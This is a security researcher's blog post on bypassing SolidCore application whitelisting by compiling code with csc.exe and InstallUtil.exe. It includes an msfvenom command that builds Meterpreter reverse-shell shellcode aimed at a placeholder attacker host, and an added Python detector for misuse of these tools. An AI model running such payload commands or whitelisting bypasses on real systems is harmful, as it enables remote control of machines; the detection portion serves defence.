Bypassing Application Whitelisting Solution SolidCore Part II

Execution of Malicious Code without Disabling SolidCore Service

In these scenarios, our goal is not to disable SolidCore but to run unauthorized code while the SolidCore service is still running.

Using ASP.NET Framework Utility csc.exe and Installutil.exe

In this attack scenario, we write some nifty code and compile it on the system itself. csc.exe is the C# compiler, located in “C:\Windows\Microsoft.NET\Framework\v2.0.50727\”.

Its location might vary depending on the exact configuration of a particular computer. If more than one version of the .NET Framework is installed on your computer, you’ll find multiple versions of this file.

To get a reverse shell, we created shellcode using the “msfvenom” utility:

msfvenom -p windows/meterpreter/reverse_tcp lhost=attackerip lport=443 -f csharp > shellcode.txt
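
For defenders, the note above about multiple .NET Framework versions means a monitoring rule pinned to a single csc.exe path misses the other copies. The following is an added example, not code from the original post: it classifies process-creation records for csc.exe and InstallUtil.exe under any Framework version directory. The record field names, the expected-parent list, the v4.0.30319 directory and the sample paths are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Match csc.exe / InstallUtil.exe under any installed .NET Framework version,
# 32-bit (Framework) or 64-bit (Framework64), not only v2.0.50727.
DOTNET_TOOL = re.compile(
    r"^[a-z]:\\windows\\microsoft\.net\\framework(64)?\\v[\d.]+\\(csc|installutil)\.exe$",
    re.IGNORECASE,
)
TOOL_NAMES = {"csc.exe", "installutil.exe"}
# Assumption: parents that legitimately launch these tools in this environment.
EXPECTED_PARENTS = {"msbuild.exe", "devenv.exe"}


def classify(event):
    """Return a finding for one process-creation record, or None."""
    image = event["image"]
    if PureWindowsPath(image).name.lower() not in TOOL_NAMES:
        return None
    if not DOTNET_TOOL.match(image):
        # Tool name seen outside the Framework directories (a copied binary).
        return "tool-outside-framework-dir"
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    if parent not in EXPECTED_PARENTS:
        return "framework-tool-unexpected-parent"
    return None


# Constructed sample records; field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\BuildTools\msbuild.exe"},
    {"image": r"C:\Users\Public\csc.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]


def findings(events=SAMPLE_EVENTS):
    """Return (image, finding) pairs for every record that was flagged."""
    return [(e["image"], f) for e in events if (f := classify(e))]

if __name__ == "__main__":
    print(*(f"{f}: {img}" for img, f in findings()), sep="\n")
```

On a real estate, the expected-parent set should come from observed build activity, since developer workstations and build servers run csc.exe routinely.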

Vinesh Redkar
Senior Security Researcher

Security professional with over 9 years of experience in the security domain across various industries such as Finance, Insurance, Telecom, and government.